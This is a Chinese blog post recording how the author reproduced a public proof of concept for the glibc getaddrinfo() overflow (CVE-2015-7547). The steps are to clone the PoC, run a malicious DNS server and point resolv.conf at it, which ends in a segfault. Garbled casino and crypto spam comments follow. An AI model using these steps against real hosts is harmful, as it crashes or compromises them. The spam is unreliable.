2016年2月18日 星期四

CVE-2015-7547


這篇簡單記錄了我第一次驗證別人poc(proof-of-concept)的過程。

poc就是驗證某個概念、原理,在資安領域講簡單一點就是去exploit。


前言


CVE-2015-7547 是glibc中的 getaddrinfo()存在stack-based buffer overflow漏洞。這個漏洞其實從2015年就發現了,後來google和red hat的人一起研究並寫出了poc表示這個漏洞有其嚴重性。
漏洞主要發生在glibc 2.9版以後,查了一下發現我手邊的server全部中招。
比較完整的資訊可以參考:

CVE-2015-7547: Critical Vulnerability in glibc getaddrinfo


getaddrinfo() 主要用來查一個 host 所對應的 IP address,底層會去query DNS Server並得到結果。
此時若 DNS Server 回應了惡意的 payload ,可以造成 getaddrinfo() buffer overflow,利用這個漏洞來exploit client端的主機。

驗證過程



先將 poc code clone下來,
$ git clone https://github.com/fjserna/CVE-2015-7547
其中 CVE-2015-7547-poc.py 是惡意的DNS Server code, CVE-2015-7547-client.c 是client端呼叫 getaddrinfo() 的code。

我讓 CVE-2015-7547-poc.py bind 在本機的port 53,這需要root權限。如果 port 53 有其他服務(像是ubuntu有dnsmasq)請先將它disable再執行.py檔。
$ sudo ./CVE-2015-7547-poc.py

再來更改本機 nameserver 的設定,把原本的nameserver設定註解掉,改成指向本機端的DNS Server,讓本機的DNS query都向我們的惡意DNS Server查詢。
/etc/resolv.conf
# Dynamic resolv.conf(5) file for glibc resolver(3) generated by resolvconf(8)
# DO NOT EDIT THIS FILE BY HAND -- YOUR CHANGES WILL BE OVERWRITTEN
#nameserver 140.112.2.2
nameserver 127.0.0.1

最後,將 CVE-2015-7547-client.c 編譯成可執行檔並執行,就會發生seg fault了。
$ make
gcc -o CVE-2015-7547-client CVE-2015-7547-client.c

$ ./CVE-2015-7547-client
Segmentation fault (core dumped) 
接著我會嘗試利用這個漏洞拿到shell,但好像沒那麼簡單XD,如果成功的話會再把payload貼上來。

5 則留言:

  1. Within our large selection of UK free slots to 먹튀사이트 먹튀프렌즈 play for fun, there’s a universe of slot themes. Immerse yourself in the historic Egyptian tombs in Book of Dead, unimaginable fantasy worlds and smash hit TV reveals. If you’re a brand new} crypto casino participant, might get} a 400% welcome bonus of a lot as} $4,000. If not, there are additionally other welcome deposit bonuses that you could get even when you don’t have crypto. There are loads of promos and bonuses obtainable at Wild Casino online. For instance, new players with cryptos like Bitcoin can get a combined welcome bonus of a lot as} $9,000 on their first 5 deposits.

    回覆刪除
  2. Compliance with these laws ensures players are handled pretty and makes Spin Casino a protected and safe player within the business. If you’re a fan of sports betting as well as|in addition to} on line casino gaming, then you may positively need to give TonyBet a go. Coupled with this, Spin Casino has a great loyalty program that gives an incentive for players to stick round and make Spin their regular on line casino. The program is completely free casino.edu.kg to affix, and you earn factors on every cash wager you make, which can then be swapped for bonus credits to spend on a variety of|quite a lot of|a wide range of} perks and rewards.

    回覆刪除
  3. It can also be|can be} important that they research the net casinos they plan on patronizing before actually depositing any money. Cryptos, especially Bitcoin, have made inroads into on-line casino gambling. With these, gamers in South Korea can complete transactions with out having to fret about 1XBET getting arrested or their bank accounts being frozen.

    回覆刪除